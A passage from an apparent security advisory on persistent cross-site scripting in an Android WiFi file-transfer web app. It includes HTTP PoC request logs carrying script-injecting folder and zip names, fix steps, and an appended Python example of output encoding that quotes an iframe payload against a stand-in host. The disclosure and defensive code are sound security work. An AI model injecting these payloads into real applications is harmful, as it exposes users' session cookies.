payload as folder name, file name or zip file name and save via a POST method request<br />5. The payload executes in the web UI when previewing the paths<br /><br /><br />Exploitation: Payload<br /><a onmouseover=alert(document.cookie)>picture1337.jpg</a><br /><br /><br />--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---<br />http://localhost:1234/storage/emulated/0/DCIM/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676<br />Content-Length: 613<br />Origin:http://localhost:1234<br />Connection: keep-alive<br />Referer:http://localhost:1234/storage/emulated/0/DCIM/<br />action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/<br />-<br />POST: HTTP/1.1 302 OK<br />Connection: Close<br />Content-Type: text/html<br />Location:http://localhost:1234/storage/emulated/0/DCIM/<br />Content-Length: 143<br />-<br />http://localhost:1234/storage/emulated/0/DCIM/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Referer:http://localhost:1234/storage/emulated/0/DCIM/<br />Connection: keep-alive<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br /><br /><br />--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---<br />http://localhost:1234/storage/emulated/0/Pictures/?<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045<br />Content-Length: 882<br />Origin:http://localhost:1234<br />Connection: keep-alive<br />Referer:http://localhost:1234/storage/emulated/0/Pictures/?<br />Upgrade-Insecure-Requests: 1<br />action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br 
/>Location:http://localhost:1234/storage/emulated/0/Pictures/<br />Content-Length: 151<br />-<br />http://localhost:1234/storage/emulated/0/Pictures/<br />Host: localhost:1234<br />Accept-Encoding: gzip, deflate<br />Referer:http://localhost:1234/storage/emulated/0/Pictures/?<br />Connection: keep-alive<br />Upgrade-Insecure-Requests: 1<br />-<br />POST: HTTP/1.1 200 OK<br />Connection: Close<br />Content-Type: text/html<br /><br /><br />Reference(s):<br />http://localhost:1234/<br />http://localhost:1234/storage/<br />http://localhost:1234/storage/emulated/<br />http://localhost:1234/storage/emulated/0/<br />http://localhost:1234/storage/emulated/0/DCIM/<br />http://localhost:1234/storage/emulated/0/Pictures/<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The persistent web vulnerabilities can be resolved by the following steps ...<br />1. Restrict the input of the folder, file and zip names to disallow special chars in the add or create process<br />2. Encode and escape the content of the data_file parameter to sanitize the content<br />3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent web vulnerabilities in the mobile android wifi web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /></code></pre>
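The fix steps in the users/activity-log advisory above (the name parameter rendered into a table cell and into the Delete button's onclick handler) and in the WiFi File Transfer advisory (the data_file parameter rendered into the explorer path listing) come down to the same two controls: allowlist the input, and encode at every output context. The following is an added example that is not code from either application; render_delete_link, render_listing and the SAFE_NAME pattern are hypothetical models of the HTML contexts visible in the dumps, and the payloads are taken from the advisories as constructed test input.

```python
"""Output encoding per context plus input allowlisting for the name / data_file
fixes above. Added example; the render functions and SAFE_NAME are assumptions."""
import html
import json
import re
from urllib.parse import quote

# Payloads copied from the advisory dumps above, used here as constructed test input.
KNAP_PAYLOAD = 'Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>'
WIFI_PAYLOAD = 'New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>'


def html_text(value):
    """Fix step 2: encode for HTML text and attribute context (<td>, <strong>, href=...)."""
    return html.escape(value, quote=True)


def js_string_in_attribute(value):
    """Encode a value that becomes a JavaScript string literal inside an HTML event
    handler, as in onclick="knap.deleteAlert('users','...<strong>NAME</strong>...',19)".
    Order matters: JS-string-encode first, then HTML-attribute-encode the result."""
    js = json.dumps(value)[1:-1]          # backslash-escapes quotes and control chars
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026'), ("'", '\\u0027')):
        js = js.replace(ch, esc)          # tag and quote characters never reach the HTML parser
    return html.escape(js, quote=True)


def render_delete_link(user_id, name):
    """The users-list Delete button from the dump, rebuilt with layered encoding:
    the dialog body is HTML (layer 1), which sits inside a JS string (layer 2),
    which sits inside an HTML attribute (layer 3)."""
    body = ('Are you sure you want to delete <strong>' + html_text(name)
            + '</strong>? This action cannot be undone.')
    handler = "knap.deleteAlert('users','%s',%d)" % (js_string_in_attribute(body), int(user_id))
    return '<a href="javascript:;" onclick="%s">Delete</a>' % handler


# Fix step 1 for data_file: an allowlist rather than a blocklist. Letters, digits,
# space, dot, underscore and dash; must not start with a dot; no path separators.
SAFE_NAME = re.compile(r'^[A-Za-z0-9][A-Za-z0-9 ._-]{0,254}$')


def is_safe_entry_name(name):
    """True only for folder, file and zip names that cannot carry markup or traversal."""
    return bool(SAFE_NAME.match(name)) and '..' not in name


def render_listing(directory, entries):
    """Fix step 3: the explorer path listing encodes every entry at output time,
    URL-encoding the href and HTML-encoding the link text."""
    items = ['<li><a href="%s">%s</a></li>' % (html_text(quote(directory + name)), html_text(name))
             for name in entries]
    return '<ul>' + ''.join(items) + '</ul>'


if __name__ == '__main__':
    print(render_delete_link(19, KNAP_PAYLOAD))
    print(is_safe_entry_name(WIFI_PAYLOAD), is_safe_entry_name('picture1337.jpg'))
    print(render_listing('/storage/emulated/0/DCIM/', [WIFI_PAYLOAD, 'picture1337.jpg']))
```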